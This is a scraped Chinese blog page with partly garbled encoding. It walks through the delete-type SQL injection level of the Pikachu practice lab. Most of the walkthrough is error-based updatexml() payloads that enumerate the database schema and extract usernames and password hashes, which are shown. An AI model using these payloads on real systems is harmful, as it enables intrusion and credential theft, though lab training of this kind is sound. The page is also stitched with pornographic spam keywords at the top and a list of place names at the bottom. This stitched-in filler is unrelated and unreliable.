五月天青色头像情侣网名,国产亚洲av片在线观看18女人,黑人巨茎大战俄罗斯美女,扒下她的小内裤打屁股

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

Pikachu 漏洞練習(xí)平臺(tái)Sql Injection Delete型注入通關(guān)指南pika~pika~

2023-03-11 12:31 作者:Yukito_online  | 我要投稿


刪除數(shù)據(jù)的時(shí)候觀察F12發(fā)送了一個(gè)GET請(qǐng)求的數(shù)據(jù)包,猜測(cè)id字段存在注入點(diǎn)

傳一個(gè)單引號(hào),發(fā)現(xiàn)報(bào)錯(cuò),證實(shí)id字段存在注入點(diǎn),我們用updataxml()方法,原理是updatexml()不認(rèn)識(shí)~(ASCII碼0x7e)

1+||+updatexml(1,concat(0x7e,database()),2)
1+||+updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 3,1)),2)
1+||+updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1)),2)
1+||+updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 12,1)),2)
1+||+updatexml(1,concat(0x7e,(select username from users limit 1,1)),2)
1+||+updatexml(1,concat(0x7e,(select username from users limit 0,1)),2)
1+||+updatexml(1,concat(0x7e,(select username from users limit 2,1)),2)
1+||+updatexml(1,concat(0x7e,(select password from users limit 0,1)),2)
1+||+updatexml(1,concat(0x7e,(select password from users limit 1,1)),2)
1+||+updatexml(1,concat(0x7e,(select password from users limit 2,1)),2)

admin:e10adc3949ba59abbe56e057f20f883

pikachu:670b14728ad9902aecba32e22fa4f6b

test:e99a18c428cb38d5f260853678922e0?


標(biāo)簽:

Pikachu 漏洞練習(xí)平臺(tái)Sql Injection Delete型注入通關(guān)指南pika~pika~的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國家法律
卢氏县| 新丰县| 林芝县| 泗阳县| 安顺市| 青浦区| 绵竹市| 安庆市| 嘉义市| 天峨县| 三门县| 阳春市| 德安县| 宿松县| 罗田县| 鞍山市| 靖安县| 阜阳市| 渭源县| 安义县| 衡阳县| 德化县| 青冈县| 临汾市| 黎川县| 四川省| 乌鲁木齐市| 恩施市| 舞阳县| 磐安县| 共和县| 喜德县| 江陵县| 义乌市| 奉化市| 宜宾县| 南康市| 宝应县| 平江县| 阿拉善盟| 乌苏市|